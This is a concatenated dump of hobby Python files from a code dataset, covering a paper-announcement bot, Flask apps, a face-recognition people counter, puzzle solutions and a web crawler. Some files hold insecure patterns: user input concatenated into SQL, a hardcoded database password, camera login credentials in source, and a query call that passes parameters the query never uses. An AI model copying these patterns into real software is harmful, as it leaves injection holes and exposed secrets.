LOG.debug(\"Checking twitter input arguments\")\n for k in list(args.keys()):\n if k.startswith(\"twitter\") and k not in (\"twitter_limit\", \"twitter_preference\") and args[k] is None:\n LOG.error(\"Missing '%s' input parameter for Twitter\" % k)\n sys.exit(1)\n ## FOR\n ## IF\n\n ## ----------------------------------------------\n \n # Create the database if we don't have it\n if not os.path.exists(DB_PATH):\n createDatabase()\n db = sqlite3.connect(DB_PATH)\n cur = db.cursor()\n \n # Get the volume URLs\n if args[\"collect\"]:\n papers = { }\n for vol in range(args[\"collect_start\"], args[\"collect_stop\"]+1):\n url = START_URL % vol\n p = getPapers(vol, url)\n if p: papers.update(p)\n\n # Figure out what papers are new\n for key in reversed(sorted(papers.keys())):\n LOG.debug(\"key=%s\", key)\n for p in papers[key]:\n sql = \"SELECT * FROM papers WHERE link = ?\"\n cur.execute(sql, (p[\"link\"],))\n row = cur.fetchone()\n if row is None:\n LOG.debug(\"Adding %s\" % p[\"link\"])\n \n sql = \"\"\"INSERT INTO papers (\n link, title, authors, volume, number, published\n ) VALUES (\n ?, ?, ?, ?, ?, ?)\"\"\"\n cur.execute(sql, (p[\"link\"], p[\"title\"], p[\"authors\"], p[\"volume\"], p[\"number\"], p[\"published\"],))\n ## FOR\n ## FOR\n db.commit()\n ## IF\n\n ## Post new papers to Twitter\n if args[\"twitter\"]:\n sql = \"SELECT * FROM papers WHERE twitter = 0 ORDER BY volume ASC, number ASC, \"\n if 'twitter_preference' in args and args['twitter_preference']:\n sql += \"CASE WHEN authors LIKE '%\" + args['twitter_preference'] + \"%' THEN NULL ELSE link END DESC\"\n else:\n sql += \"link\"\n LOG.debug(sql)\n \n new_papers = [ ]\n for row in cur.execute(sql):\n paper = {\n \"link\": row[0],\n \"title\": row[1],\n \"authors\": row[2],\n \"volume\": row[3],\n \"number\": row[4],\n \"published\":row[5],\n }\n new_papers.append(paper)\n ## FOR\n paper_count = 0\n for paper in new_papers:\n postTwitter(args, db, paper)\n paper_count += 1\n if args[\"twitter_limit\"] and paper_count > args[\"twitter_limit\"]:\n break\n LOG.warn(\"Sleeping for %d seconds...\" % TWITTER_SLEEP_TIME)\n time.sleep(TWITTER_SLEEP_TIME)\n ## FOR\n ## IF\n\n # Always create the RSS files from scratch\n if args[\"rss\"]:\n assert args[\"rss_path\"]\n \n sql = \"SELECT * FROM papers ORDER BY volume ASC, number DESC, link\"\n papers = [ ]\n for row in cur.execute(sql):\n paper = {\n \"link\": row[0],\n \"title\": row[1],\n \"authors\": row[2],\n \"volume\": row[3],\n \"number\": row[4],\n \"published\":row[5],\n }\n papers.append(paper)\n ## FOR\n writeRSS(papers, args[\"rss_path\"])\n ## IF\n \n db.close()\n## MAIN\n \n \n\n","repo_name":"apavlo/pvldb-announce","sub_path":"pvldb-announce.py","file_name":"pvldb-announce.py","file_ext":"py","file_size_in_byte":13382,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"35"} +{"seq_id":"39822685364","text":"from random import choice\nfrom flask import Flask, render_template\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route(\"/wisdom\")\ndef wisdom():\n quotes = [\n \"Confucius say, man who run before bus get tired\",\n \"Confucius say, cow with no legs, ground beef\",\n \"Life is really simple, but we insist on making it complicated.\",\n ]\n return f''\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"djmunro/htmx-clone","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30043050637","text":"# History page, displays a list of recipes that the logged in user has looked at.\n# Also gives users the option to delete their history page.\nfrom flask import Blueprint, render_template, request, redirect, url_for\nfrom flask_login import current_user\nfrom flask_cors import CORS\n\nfrom .models import Recipes, Profiles, History\nfrom . import db\nimport psycopg2\nimport json\n\n\nhistorys = Blueprint('history', __name__)\nCORS(historys)\n\n# Card class used to store the recipe information and image url\nclass Card:\n def __init__(self, recipe, url):\n self.recipe = recipe\n self.url = url\n\n# Browsing history, list most recent browsed recipes.\n@historys.route('/history', methods = ['GET','POST'])\ndef history():\n \n if current_user.is_authenticated: \n histories = History.query.filter_by(userid = current_user.id).order_by(History.last_view_date.desc(), History.last_view_time.desc()).all()\n query = []\n for i in histories:\n if i.last_view_date and i.last_view_time:\n recipes = Recipes.query.filter_by(id = i.recipe).all()\n for recipe in recipes:\n # Link the creator's name as url\n creator_name = recipe.creator.split(\" \")\n profile = Profiles.query.filter_by(owns = recipe.creates, last_name = creator_name[1], first_name = creator_name[0]).first()\n card = Card(recipe, profile.custom_url)\n query.append(card)\n else:\n return render_template(\"restricted_access.html\")\n \n \n \n \n conn = psycopg2.connect(\n database=\"rec\", user='postgres', password='aa', host='localhost', port= '5432'\n)\n conn.autocommit = True\n cursor = conn.cursor()\n # i1 is the history of the curr user joined with ingredients to see what ingredients their history has.\n # i2 is a list of recipes that have ingredients which arent in the i1 list.\n # i1 is joined with i2 so it can find a list of recipes which use the same ingredients or ingredients with similar names as the ones in their history, but dont contain any of the\n # recipes that are already in their recipe, where it counts the amount of times that a recipe has the same ingredients as the previous recipes.\n # meaning if recipe 1 and recipe 2 have 3 ingredients in common or ingredients that are similar then it will count that\n # this list is called s1 and then unioned with another list which is basically the same as s1 but the regex is the opposite way to ensure\n # that it takes cases that are missed by s1, ex. 'chicken' is like 'chicken wing' but 'chicken wing' is not like 'chicken'\n # then that joined list is called s2 and that is joined with recipes to find the name and photo of the recipes, where it is order by highest to\n # lowest count of similar ingredients, then those with highest ingredients is displayed first.\n \n \n # tldr: count amount of similar ingredients of other recipes then display the ones with the highest similar ingredients.\n sql ='''select s2.recipe_id, count(*), name, photo\n from\n (select * from\n (select * from\n (select distinct ingredient\n from history h\n join ingredient i on i.recipe_id = h.recipe\n where userid=5) i1\n inner join\n (select recipe_id, ingredient from Ingredient\n except\n \n select recipe_id, ingredient\n from history h\n join ingredient i on i.recipe_id = h.recipe\n where userid=5) i2\n \n on lower(concat('%%', i1.ingredient, '%%')) like lower(concat( '%%', i2.ingredient, '%%'))) s1 \n union\n (select * from\n (select distinct ingredient\n from history h\n join ingredient i on i.recipe_id = h.recipe\n where userid=5) i1\n inner join\n (select recipe_id, ingredient from Ingredient\n except\n \n select recipe_id, ingredient\n from history h\n join ingredient i on i.recipe_id = h.recipe\n where userid=5) i2\n \n on lower(concat('%%', i2.ingredient, '%%')) like lower(concat( '%%', i1.ingredient, '%%')))) s2\n \n \n join recipes r \n on r.id = s2.recipe_id\n group by s2.recipe_id, r.name, r.photo\n order by count desc\n limit 4;\n '''\n \n id = str(current_user.id)\n \n cursor.execute(sql, (id, id))\n res=cursor.fetchall()\n \n \n return render_template(\"history.html\", query=query, type=\"recent\", res=res)\n\n# Delete the browsing record in the history page\n@historys.route('/delete history', methods=['GET', 'POST'])\ndef delete_history():\n if request.method == 'POST':\n browsing_history = json.loads(request.data)\n recipeId = browsing_history['id']\n delete_histories = History.query.filter_by(userid = current_user.id, recipe = recipeId).first()\n db.session.delete(delete_histories)\n db.session.commit()\n histories = History.query.filter_by(userid = current_user.id).order_by(History.last_view_time.asc()).all()\n query = []\n for i in histories:\n recipes = Recipes.query.filter_by(id = i.recipe).all()\n for j in recipes:\n query.append(j)\n return redirect(url_for('recipes.history'))\n","repo_name":"benjamin-lai/myrecipes","sub_path":"website/history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":5914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"72834444913","text":"from typing import List, Tuple\nfrom util import load\n\nStacks = List[List[str]]\nCommands = List[Tuple[int, int, int]]\n\n\ndef parse_stacks(lines: List[str]) -> Tuple[Stacks, List[str]]:\n stacks = [[] for _ in range((len(lines[0]) // 4) + 1)]\n for lineNumber, line in enumerate(lines):\n for i, j in enumerate(range(1, len(lines[0]), 4)):\n c = line[j]\n if c.isdigit():\n # Also return the remaining lines to parse the commands from\n return (stacks, lines[lineNumber + 2 :])\n if c != \" \":\n stacks[i].append(c)\n\n\ndef parse_cmds(lines: List[str]) -> Commands:\n for l in lines:\n _, amount, _, origin, _, target = l.split()\n yield int(amount), int(origin) - 1, int(target) - 1\n\n\ndef part1(stacks: Stacks, commands: Commands) -> str:\n _stacks = [s.copy() for s in stacks]\n for amount, origin, target in commands:\n for _ in range(amount):\n _stacks[target].insert(0, _stacks[origin].pop(0))\n return \"\".join([s[0] for s in _stacks])\n\n\ndef part2(stacks: Stacks, commands: Commands) -> str:\n _stacks = [s.copy() for s in stacks]\n for amount, origin, target in commands:\n segment = _stacks[origin][:amount]\n _stacks[origin] = _stacks[origin][amount:]\n _stacks[target] = segment + _stacks[target]\n return \"\".join([s[0] for s in _stacks])\n\n\ndef solve(data: str):\n lines = data.splitlines()\n stacks, lines = parse_stacks(lines)\n commands = parse_cmds(lines)\n\n print(\"Part 1:\", part1(stacks, commands))\n print(\"Part 2:\", part2(stacks, commands))\n\n\nif __name__ == \"__main__\":\n solve(load(5))\n","repo_name":"danielcmessias/AOC2022","sub_path":"05.py","file_name":"05.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"13677817001","text":"from flask_app.config.mysqlconnection import connectToMySQL\nfrom flask import flash\nfrom flask_app.models import user\n\nclass Message:\n def __init__(self, data):\n self.id = data['id']\n self.sender = user.User.get_user_by_id({\n 'id': data['sender_id']\n })\n self.receiver = user.User.get_user_by_id({\n 'id': data['receiver_id']\n })\n self.message = data['message']\n self.created_at = data['created_at']\n self.updated_at = data['updated_at']\n\n @classmethod\n def save(cls, data):\n query = \"INSERT INTO messages (sender_id, receiver_id, message) VALUES(%(sender)s, %(receiver)s, %(message)s);\"\n message_id = connectToMySQL('user_schema').query_db(query, data)\n return message_id\n\n @classmethod\n def get_all(cls):\n query = \"SELECT * FROM messages\"\n all_messages_in_db = connectToMySQL('user_schema').query_db(query)\n all_messages = []\n for one_message in all_messages_in_db:\n all_messages.append(cls(one_message))\n return all_messages\n\n @classmethod\n def delete(cls, data):\n query = \"DELETE FROM messages WHERE id = %(id)s\"\n connectToMySQL('user_schema').query_db(query, data)\n return ","repo_name":"beqasabana/login-registration","sub_path":"flask_app/models/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"20184106483","text":"\"\"\"\r\nDefinition of TreeNode:\r\nclass TreeNode:\r\n def __init__(self, val):\r\n self.val = val\r\n self.left, self.right = None, None\r\n\"\"\"\r\n\r\n\r\nclass Solution:\r\n \"\"\"\r\n @param root: the root of binary tree\r\n @return: the root of the maximum average of subtree\r\n \"\"\"\r\n\r\n def findSubtree2(self, root):\r\n # write your code here\r\n if root is None:\r\n return root\r\n\r\n self.maximum_average = -float(\"Inf\")\r\n self.result = None\r\n\r\n self.helper(root)\r\n\r\n return self.result\r\n\r\n def helper(self, node):\r\n if node is None:\r\n return 0, 0\r\n\r\n left_sum, left_size = self.helper(node.left)\r\n right_sum, right_size = self.helper(node.right)\r\n\r\n tree_sum, sum_size = node.val + left_sum + right_sum, left_size + right_size + 1\r\n\r\n if tree_sum / sum_size > self.maximum_average:\r\n self.maximum_average = tree_sum / sum_size\r\n self.result = node\r\n\r\n return tree_sum, sum_size\r\n\r\n\r\n","repo_name":"monpro/algorithm","sub_path":"src/binary-trees/subtree-with-maximum-average.py","file_name":"subtree-with-maximum-average.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"39"} +{"seq_id":"36984964320","text":"import tkinter as tk\nimport random\nimport pygame as pg\n\nclass Tetris:\n '俄罗斯方块'\n cell_size=30\n def __init__(self,parent):\n self.parent=parent\n self.canvas=tk.Canvas(root)\n self.canvas.grid(row=0,column=0)\n self.tickrate=1000\n self.parent.after(self.tickrate,self.tick)\n print(self)\n print(self.parent)\n def tick(self):\n print(\"嘀哒\")\n print(self)\n print(self.parent)\n print(self.parent.after)\n #self.parent.after(self.tickrate,self.tick)\n \nroot=tk.Tk() \ntetris=Tetris(root)\nroot.mainloop()\n","repo_name":"orangutan78/pythonLearning","sub_path":"orangutan/pygame/Tetris-foreign.py","file_name":"Tetris-foreign.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"31801358376","text":"from rest_framework.authtoken.views import obtain_auth_token\nfrom django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n \n path('register/', views.register, name='register'),\n path('logout/', views.logout, name='logout'),\n path('view_user//', views.view_user, name='view_user'),\n path('update_user//', views.update_user, name='update_user'),\n path('send_money/', views.send_money, name='send_money'),\n path('request_money/', views.request_money, name='request_money'),\n path('activity/', views.activity, name='activity'),\n]","repo_name":"Dayakatherin/upisystem","sub_path":"usermanagement/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"18142619759","text":"import os\nimport sys\nfrom datetime import datetime\nfrom time import sleep, time\nimport argparse\n\nimport cv2\nimport numpy as np\nimport onnxruntime as ort\nimport torchvision.transforms as transforms\nfrom hikvisionapi import Client\nfrom PIL import Image\nfrom scipy.spatial.distance import cosine\nfrom tqdm import tqdm\n\nfrom align.align_trans import get_reference_facial_points, warp_and_crop_face\nfrom insightface.app import FaceAnalysis\nfrom trackableobject import TrackableObject\n\nsys.path.append('utils/')\nfrom sort_tracker import SORT\n\nreference = get_reference_facial_points(default_square=True)\n\nknown_people_list = []\nmodel = ort.InferenceSession(\"models/ir_50_arcface_batch384.onnx\", providers=['CUDAExecutionProvider', 'CPUExecutionProvider'])\n\nglobal cam\nsource = 1\ndef load_known_faces():\n global known_people_list, model\n # if os.path.exists(\"facedb.npy\"):\n # known_people_list = list(np.load('facedb.npy', allow_pickle=True))\n # print(\"loaded from file\")\n # print(known_people_list)\n # sleep(3)\n known_faces=\"test/\"\n list_images = os.listdir(known_faces)\n for img_name in tqdm(list_images):\n person_name = img_name.split(\".\")[0]\n image_path = os.path.join(known_faces, img_name)\n image = cv2.imread(image_path)\n face_encodings = app.get(image)\n if len(face_encodings)==0:\n print(\"Cannot extract face feature from : {}\".format(img_name))\n continue;\n person = {}\n person[\"name\"] = person_name\n bbox = face_encodings[0].bbox\n # print(face.kps)\n landmarks = np.array(face_encodings[0].kps)\n landmarks = np.transpose(landmarks).reshape(10, -1)\n landmarks = np.transpose(landmarks)[0]\n facial5points = [[landmarks[j], landmarks[j + 5]] for j in range(5)]\n face_img = align_face_onnx(image, facial5points)\n embeddings = get_embeddings_immediate_onnx(face_img, model)\n person[\"embedding\"] = embeddings\n known_people_list.append(person)\n np.save('facedb.npy', known_people_list) \n\n\ndef key_func(person):\n return person[\"sim\"]\n\n\ndef resize_frame(frame):\n frame = cv2.resize(frame, (640*1024//480, 1024))\n\n frame = frame[:, frame.shape[1]//2 - 300: frame.shape[1] // 2 + 300]\n\n return frame\n\n\ndef find_face(embedding):\n best_matches = []\n \n for person in known_people_list:\n sim = 1 - cosine(person[\"embedding\"], embedding)\n if(sim>0.45):\n known = {}\n known[\"person\"]=person\n known[\"sim\"]=sim\n best_matches.append(known)\n if len(best_matches) == 0:\n return \n best_matches.sort(key=key_func)\n # print(best_matches[0][\"sim\"])\n return best_matches[0]\n\ndef get_frame_hik():\n \n vid = cam.Streaming.channels[101].picture(method ='get', type = 'opaque_data')\n bytes = b''\n # with open('screen.jpg', 'wb') as f:\n for chunk in vid.iter_content(chunk_size=1024):\n\n bytes += chunk\n a = bytes.find(b'\\xff\\xd8')\n b = bytes.find(b'\\xff\\xd9')\n if a != -1 and b != -1:\n jpg = bytes[a:b+2]\n bytes = bytes[b+2:]\n frame = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8), cv2.IMREAD_COLOR)\n return frame\n\n\ndef get_frame_video():\n \n ret, frame = cam.read()\n # print(ret)\n return frame\ndef align_face_onnx(img, landmark5):\n \n warped_face = warp_and_crop_face(img, landmark5, reference, crop_size=(112, 112), )\n\n img_warped = Image.fromarray(warped_face)\n # cv2.imwrite(\"test.jpg\", warped_face)\n return img_warped\n\n\ndef get_embeddings_immediate_onnx(face_img, model, input_size=None):\n if input_size is None:\n input_size = [112, 112]\n\n if face_img is None:\n return\n\n transform = transforms.Compose(\n [\n transforms.Resize(\n [int(128 * input_size[0] / 112),\n int(128 * input_size[0] / 112)],\n ), # smaller side resized\n transforms.CenterCrop([input_size[0], input_size[1]]),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5]),\n ],\n )\n\n # apply transformations \n face_img = transform(face_img)\n face_img = face_img[None, ...]\n face_img = face_img.cpu().detach().numpy()\n\n outputs = None\n\n outputs = model.run(None, {'input.1': face_img})\n\n\n\n if outputs is None:\n return\n\n return outputs[0]\n\nimport io\nimport json\n\nfile_name = \"{}_exp.mp4\".format(datetime.now())\nmy_writer = cv2.VideoWriter(file_name, cv2.VideoWriter_fourcc(*'MJPG'), 25, (1280, 720))\ndef main():\n\n \n\n\n load_known_faces()\n\n # ct = CentroidTracker(maxDisappeared=30, maxDistance=200)\n trackers = []\n ct = SORT(max_lost=5, iou_threshold=0.3)\n trackableObjects = {}\n global model\n # np.save('test3.npy', known_people_listp00) \n # exit(0)\n # d = np.load('test3.npy')\n # print(known_people_list)\n if False:\n global cam\n cam = Client('http://192.168.0.250', 'admin', 'inomjon199303_R')\n # else:\n # rtsp://admin:inomjon199303_R@192.168.0.250:554/Streaming/channels/101\n cam = cv2.VideoCapture(\"videos/D15_20230213153059.mp4\")\n Y_line = 720\n totalDown = 0\n totalUp = 0\n count = 0\n while(1):\n # _, frame = cap.read()\n\n # cv2.namedWindow('img', cv2.WINDOW_FREERATIO)\n # cv2.setWindowProperty('img', cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)\n # print(_)\n rects=[]\n if False:\n frame = get_frame_hik()\n # print(\"hi\")\n # else:\n frame = get_frame_video()\n count+=1\n if count<1700:\n continue\n # frame = cv2.resize(frame, )\n if frame is None:\n print(\"frame is None\")\n # continue\n break\n\n start = time()\n # print(frame.shape)\n faces = app.get(frame)\n kps_list = []\n # print(\"time cost: {}\".format(time()-start))\n for face in faces:\n bbox = face.bbox\n # print(face.kps)\n landmarks = np.array(face.kps)\n landmarks = np.transpose(landmarks).reshape(10, -1)\n landmarks = np.transpose(landmarks)[0]\n # print(landmarks.astype('int'))\n # exit(0)\n person = None\n x1,y1,x2,y2 = int(bbox[0]), int(bbox[1]), int(bbox[2]), int(bbox[3])\n kps = landmarks.astype('int')\n rects.append([x1, y1, x2, y2])\n kps_list.append(kps)\n # print(face.kps)\n # exit(0)\n # cv2.rectangle(frame, (x1, y1), (x2, y2), (0,255,0), 1)\n # print(face)\n # person = find_face(face.embedding)\n\n # if person is None:\n # continue\n # frame = cv2.putText(frame, person[\"person\"][\"name\"], (int(x1), int(y1)), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,255,0), 2, cv2.LINE_AA)\n # # print(\"recognized as: {}, similarity: {}\".format(person[\"person\"][\"name\"], person[\"sim\"]))\n # # img_name = \"{}_{}.jpg\".format(person[\"person\"][\"name\"], person[\"sim\"])\n # # img_path = os.path.join(\"results\", img_name)\n # # cv2.imwrite(img_path, frame)\n # print(rects)\n \n # objects = ct.update(rects)\n # print(rects)\n # cv2.line(frame, (0, Y_line), (2560, Y_line), (0, 0, 0), 3)\n objects = ct.update(np.array(rects), np.array(kps_list), np.ones(len(rects)))\n # print(objects)\n # loop over the tracked objects\n tic = time()\n for obj in objects:\n # check to see if a trackable object exists for the current\n # object ID\n # print(obj)\n objectID = obj[1]\n cv2.rectangle(frame, (obj[2], obj[3]), (obj[4], obj[5]), (0,255,0), 2)\n bbox = obj[2:6]\n kps = obj[6]\n cy = (obj[3]+obj[5])/2\n # print(centroid[6:])\n # print(kps)\n # print(len(kps))\n facial5points = [[kps[j], kps[j + 5]] for j in range(5)]\n # print(facial5points)\n # cv2.circle(frame, (facial5points[0][0],facial5points[0][1]), 4, (0,0,255), -1)\n to = trackableObjects.get(objectID, None)\n\n # if there is no existing trackable object, create one\n if to is None:\n to = TrackableObject(objectID, obj)\n else:\n to.path_length+=1\n to.centroids.append(obj)\n if not to.counted:\n if to.startY > Y_line and cy < Y_line and to.path_length>2:\n totalUp += 1\n to.counted = True\n\n elif to.startY < Y_line and cy > Y_line and to.path_length>2:\n totalDown += 1\n to.counted = True\n\n if not to.recognized:\n person = None\n face_img = align_face_onnx(frame, facial5points)\n embeddings = get_embeddings_immediate_onnx(face_img, model)\n person = find_face(embeddings)\n if person is not None:\n print(person[\"person\"][\"name\"])\n to.name = person[\"person\"][\"name\"]\n to.recognized = True\n\n \n \n\n trackableObjects[objectID] = to\n if to.recognized:\n text = \"{}\".format(to.name)\n else:\n text = \"ID {}\".format(objectID)\n cv2.putText(frame, text, (obj[2], obj[3]),\n cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 4)\n # cv2.circle(frame, (centroid[0], centroid[1]), 4, (255, 255, 255), -1)\n # print(time()-start)\n # print(\"loop: \", time()-tic)\n info = [\n (\"Exit\", totalUp),\n (\"Enter\", totalDown),\n ]\n\n\n # # Display the output\n # for (i, (k, v)) in enumerate(info):\n # text = \"{}: {}\".format(k, v)\n # cv2.putText(frame, text, (10, 1440 - ((i * 40) + 40)), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (255, 255, 0), 4)\n\n cv2.imshow(\"SORT tracker\", cv2.resize(frame, (1080,720)))\n my_writer.write(cv2.resize(frame, (1280, 720)))\n k = cv2.waitKey(2)\n if k==ord(\"q\"):\n cv2.destroyAllWindows()\n # cap.release()\n break\n \n\n\n\n\ndef test():\n img1 = cv2.imread(\"1.jpeg\")\n start = time()\n faces = app.get(img1)\n # print(\"time cost: {}\".format(time()-start))\n for face in faces:\n print(face.rec_score)\n bbox = face.bbox\n person = None\n x1,y1,x2,y2 = bbox[0], bbox[1], bbox[2], bbox[3]\n cv2.rectangle(img1, (int(x1), int(y1)), (int(x2), int(y2)), (0,255,0), 1)\n \n cv2.imshow(\"test\", cv2.resize(img1, (480,640)))\n\n cv2.waitKey(0)\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-s\", \"--source\", default=0, help=\"input video/camera/rtsp stream\")\n args = parser.parse_args()\n # ap.add_argument(\"-d_w\", \"--detection_weights\", default=\"weights/helmet_head_person_s.pt\", help=\"detection model weights\")\n # ap.add_argument(\"-d\", \"--device\", default=\"cpu\", help=\"device type, cuda:0 or cpu\")\n # ap.add_argument(\"-th\", \"--conf_thresh\", default=0.25, help=\"confidence threshold\")\n # ap.add_argument(\"-is_video\", \"--is_video\", default=False, help=\"Read from hikvision api\")\n app = FaceAnalysis(root='./models', name='my_combo', allowed_modules=['detection'])\n app.prepare(ctx_id=0)\n # test()\n main()\n # img = ins_get_image('test')\n # faces = app.get(img)\n # for face in faces:\n # print(face)\n","repo_name":"RamatovInomjon/facelibuz","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11718,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"4837088965","text":"\"\"\"\nQuick Select\n\nSearch for the kth-smallest item\n\nThe worst-case performance of a randomized selection algorithm is O(n^2 )\n\"\"\"\n\ndef partition(arr, lo, hi):\n if lo == hi:\n return lo\n\n pivot = arr[lo]\n pivot_idx = lo\n hi_idx = hi\n\n lt_pivot_idx = hi_idx\n gt_pivot_idx = lo + 1\n\n while True:\n while arr[gt_pivot_idx] < pivot and gt_pivot_idx < hi:\n gt_pivot_idx += 1\n while arr[lt_pivot_idx] > pivot and lt_pivot_idx >= lo:\n lt_pivot_idx -= 1\n\n if gt_pivot_idx < lt_pivot_idx:\n arr[gt_pivot_idx],arr[lt_pivot_idx] = arr[lt_pivot_idx],arr[gt_pivot_idx]\n else:\n break\n\n arr[pivot_idx] = arr[lt_pivot_idx]\n arr[lt_pivot_idx] = pivot\n return lt_pivot_idx\n\n\ndef quick_select(arr, left, right, k):\n \"\"\"\n Search for the kth-smallest item\n :return:\n \"\"\"\n split = partition(arr, left, right)\n if split == k:\n return arr[split]\n elif split < k:\n return quick_select(arr, split + 1, right, k)\n else:\n return quick_select(arr, left, split-1, k)\n\ndef test_quick_select():\n inp = [([2,3,1,6,4,5,7],0,6,6),\n ([200,300,100], 0, 2, 2),\n ]\n out = [7,300]\n\n for i in range(len(inp)):\n test_res = quick_select(inp[i][0],inp[i][1],inp[i][2],inp[i][3])\n print('test_res:', test_res)\n print(\"Test\", i + 1, \":\", \"OK\\n\" if test_res == out[i] else \"Failed\\n\")\n\n\nif __name__ == '__main__':\n test_quick_select()\n\n\n","repo_name":"vladvvtesla/MyLeetCode","sub_path":"FLG/Implementations/Selection/26.QuickSelect.py","file_name":"26.QuickSelect.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"39726270605","text":"from bs4 import BeautifulSoup\nimport requests\nimport csv\n\n\nclass Oracle:\n def __init__(self):\n self.file = open(\"./csv/oracle.csv\", \"w\", encoding='utf-8', newline='')\n self.write = csv.writer(self.file)\n self.write.writerow([\"title\", \"content\", \"url\", \"cnt\", \"source\", \"keyword\", \"image\", \"createdAt\"])\n\n def main(self):\n print(\"Oracle Crawl Start\")\n idx = 1\n while 1:\n if idx == 1:\n page = 'http://www.oracloud.kr'\n else:\n page = 'http://www.oracloud.kr/page/' + str(idx) + '/'\n req = requests.get(page)\n html = req.text\n if '

        404

        ' in html:\n break\n soup = BeautifulSoup(html, 'html.parser')\n links = list(soup.find_all('a', {\"rel\": \"bookmark\"}))\n for each in links:\n title = self.parse_title(str(each))\n url = self.parse_url(str(each))\n temp_html = requests.get(url).text\n time = temp_html.split(\"datetime=\\\"\")[1][:10]\n # print(time)\n self.write.writerow([title, \"temp\", url, 0, \"oracloud\", \"temp\", \"temp\", time])\n\n idx += 1\n print(\"Oracle Crawl End\")\n\n def parse_url(self, url):\n url = url.split(\"=\\\"\")[1].split(\"\\\" rel\")[0]\n return url\n\n def parse_title(self, title):\n title = title.split(\"bookmark\\\">\")[1].split(\"\")[0]\n return title\n\n\nif __name__ == \"__main__\":\n s = Oracle()\n s.main()\n","repo_name":"team-asdf/yaboja-crawler","sub_path":"tech-crawler-ghyeon/crawl_oracloud_kr.py","file_name":"crawl_oracloud_kr.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"17552216020","text":"from collections import deque\r\n\r\nfood = int(input())\r\nclients = deque([int(x) for x in input().split()])\r\n\r\nprint(max(clients))\r\n\r\nfor client in clients.copy():\r\n if food >= client:\r\n clients.popleft()\r\n food -= client\r\n else:\r\n print(f\"Orders left: {' '.join([str(x) for x in clients])}\")\r\n break\r\nelse:\r\n print(\"Orders complete\")\r\n","repo_name":"bokakov/SoftUni","sub_path":"Advansed23/lists_as_stacks_and_queues_exercise/Fast Food.py","file_name":"Fast Food.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"11603794655","text":"class SetFileName:\n global extension\n global fileName\n\n @staticmethod\n def getExtension():\n return extension\n\n @staticmethod\n def getFileName():\n return fileName\n\n @staticmethod\n def fileNamer():\n global fileName\n global extension\n fileName = input(\"Enter .txt/.enc File Name: \")\n\n if \".txt\" == fileName[len(fileName) - 4:len(fileName)]: # Removes .txt extension if user adds it\n fileName = fileName[0:len(fileName) - 4]\n extension = '.txt'\n elif \".enc\" == fileName[len(fileName) - 4:len(fileName)]: # Removes .txt extension if user adds it\n fileName = fileName[0:len(fileName) - 4]\n extension = '.enc'\n else:\n print(\"'.txt' - .txt File\")\n print(\"'.enc' - .enc File\")\n extension = input(\"Extension Type: \")\n while extension not in ['.txt', '.enc']: # If input is invalid\n print(\"Invalid input:\", extension)\n print(\"'.txt' - .txt File\")\n print(\"'.enc' - .enc File\")\n extension = input(\"Extension Type: \")\n\n try:\n test = open(fileName + extension)\n test.close()\n except FileNotFoundError:\n print(\"File not found. Make sure that the File is in the same folder as this program.\")\n fileNamer()\n","repo_name":"KZMachine/txtProject","sub_path":"FileNamer.py","file_name":"FileNamer.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"21380656144","text":"from typing import List\n\n\nclass Solution:\n def checkPossibility(self, nums: List[int]) -> bool:\n modified = False\n n = len(nums)\n\n for i in range(1, n):\n if nums[i] < nums[i - 1]:\n if modified:\n return False\n\n if (i - 2 >= 0 and nums[i - 2] > nums[i]) \\\n and (i + 1 < n and nums[i - 1] > nums[i + 1]):\n return False\n\n modified = True\n\n return True\n","repo_name":"LeetCode101/LeetCode-Python","sub_path":"leetcode/algorithms/p0665_non_decreasing_array.py","file_name":"p0665_non_decreasing_array.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"41625803347","text":"\"\"\"add crocc course table\n\nRevision ID: a44c41d47965\nRevises: cf7a72c4d543\nCreate Date: 2023-07-13 